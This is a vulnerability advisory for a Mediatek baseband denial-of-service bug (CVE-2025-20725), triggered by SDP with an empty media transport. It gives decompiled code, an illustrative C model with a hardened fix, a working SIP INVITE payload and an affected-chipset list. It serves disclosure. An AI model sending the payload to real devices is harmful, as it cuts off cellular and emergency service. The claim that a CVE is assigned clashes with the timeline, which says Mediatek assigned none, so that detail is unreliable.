An attacker sending a malformed SIP message over VoLTE to a device with a Mediatek baseband can trigger the vulnerability described here.

The impact is a DoS in the baseband, triggered by a malformed VoLTE message such as a SIP INVITE or MESSAGE request.

The vulnerability described in this advisory affected a wide range of Mediatek devices. This vulnerability is assigned CVE-2025-20725.

Vulnerability Details

The crash happens due to a NULL pointer access.

void sdp_msg_create_negotiation_sdp(...) {
  sdp_cpy = sdp_msg_struct_copy(sdp_msg); // [1] copy = pack + unpack of sdp_msg
  if (sdp_cpy == (sdp_message_struct *)0x0) {
    ...
    return;
  }
  media = sdp_cpy->m;                      // media list of the copy
  if (media != (sdp_media_struct *)0x0) {  // only checked once, before the loop
    media_orig_p = sdp_msg->m;             // media list of the original
    while (media_orig_p != (sdp_media_struct *)0x0) { // [2] loop ends with the original list only
      tcap_p = &media->tcap;
      if ((operator_id != 0xec) || (iVar4 = strcmp(media_orig_p->transport,"RTP/AVP"), iVar4 != 0)) {
        sdp_msg_remove_attribute((short *)media->other_attributes,"acfg",(char *)0x0,0,0); // [4] media may be NULL here
        ...
      }
      ...
      media = media->next;                 // both lists advance in step, ...
      media_orig_p = media_orig_p->next;   // [3] ... but only the original is tested
    }
  }
  ...
}

void sdp_msg_pack_media(...) {
  for(; media != (sdp_media_struct *)0x0; media=media->next) { // [1] walk the media list
    if ((media->is_present == KAL_FALSE)) {
      continue;
    }
    if (media->transport[0] == '\0') { // [4] empty transport: entry is skipped, so it is absent from the copy
      continue;
    }
    ...
  }
}

The function starts by copying the SDP structure (at [1]; sdp_msg_struct_copy essentially packs and then unpacks the SDP message). The copy is returned, but it is modified in place. As sdp_msg_pack_media shows, a media entry whose transport string is empty is skipped while packing, so that entry is absent from the copy.

At [2] it can be seen that the loop runs until the original structure's media list ends. However, there is no check on the copied structure inside the loop (the only check is before the loop). This is a problem because at [3] the two lists are iterated in sync: if a media element is missing from the copy, the copied list ends before the original one does, and a null pointer is dereferenced at [4].
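As an added illustration (not code from the advisory or from the Mediatek baseband), the list desynchronisation described above modelled with a stand-in media struct: the copy drops the m= line with the empty transport, the vulnerable walk tests only the original list, and the hardened walk tests both. The struct layout, the transport strings, and every function name not quoted from the advisory are assumptions.

```c
#include <stdlib.h>
#include <string.h>
/* Stand-in for sdp_media_struct (assumed layout: only the fields the bug touches). */
typedef struct media {
    char transport[16];   /* "RTP/AVP", or "" for the "m=application 0  0" line */
    struct media *next;
} media_t;
/* Transports of the two m= lines in the advisory's payload, in order (constructed). */
const char *const PAYLOAD_TRANSPORTS[] = {"", "RTP/AVP"};
static void push(media_t ***tail, const char *transport) {  /* append to a tail-built list */
    media_t *m = calloc(1, sizeof *m);
    if (!m) abort();
    strncpy(m->transport, transport, sizeof m->transport - 1);
    **tail = m;
    *tail = &m->next;
}

/* Models sdp_msg_struct_copy (pack + unpack): sdp_msg_pack_media skips entries
 * with an empty transport, so the copy can end up shorter than the original. */
media_t *media_list_copy(const media_t *src) {
    media_t *head = NULL, **tail = &head;
    for (; src; src = src->next)
        if (src->transport[0] != '\0') push(&tail, src->transport);
    return head;
}

/* Vulnerable walk as in sdp_msg_create_negotiation_sdp: only the original list is
 * tested, so a shorter copy leaves `media` NULL and the field access faults. */
int negotiate_vulnerable(const media_t *orig, const media_t *media) {
    int n = 0;
    for (; orig; orig = orig->next, media = media->next, n++)
        (void)strcmp(media->transport, "RTP/AVP");  /* NULL deref once the copy runs out */
    return n;
}

/* Hardened walk: the condition covers both lists and a length mismatch is
 * reported rather than walked past. Returns entries processed, or -1. */
int negotiate_hardened(const media_t *orig, const media_t *media) {
    int n = 0;
    for (; orig && media; orig = orig->next, media = media->next, n++)
        (void)strcmp(media->transport, "RTP/AVP");
    return (orig || media) ? -1 : n;
}

/* Build the original list from transport strings, copy it, run the hardened walk. */
int check_sdp(const char *const *transports, size_t n) {
    media_t *orig = NULL, **tail = &orig;
    for (size_t i = 0; i < n; i++) push(&tail, transports[i]);
    return negotiate_hardened(orig, media_list_copy(orig));
}
```

negotiate_vulnerable is kept only for comparison with the hardened walk; calling it with the payload list would fault, exactly as the baseband does.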

Example payload

Change the SDP body of any valid message in the INVITE flow so that it contains the following line:

m=application 0  0

e.g.:

INVITE sip:192.168.101.2:50033;transport=tcp SIP/2.0
From: <sip:[email protected]>;tag=ttecbsI
To: "0010187049"<tel:0010187049;phone-context=ims.mnc001.mcc001.3gppnetwork.org>
CSeq: 1 INVITE
Content-Type: application/sdp
Content-Length: 784

v=0
o=0 0 0 IN IP4 0
s=0
t=0 0
m=application 0  0
m=application 0 RTP/AVP 0

Affected Devices

Includes most, possibly all, of the following devices:

MT6739, MT6761, MT6762, MT6762D, MT6762M, MT6763, MT6765, MT6765T, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6771, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8666, MT8667, MT8673, MT8675, MT8676, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791, MT8791T, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893

Timeline

  • 2025.06.23. Bug reported to Mediatek PSIRT
  • 2025.07.23. Mediatek confirms vulnerability, does not assign CVE due to low severity
  • 2025.10.01. Advisory release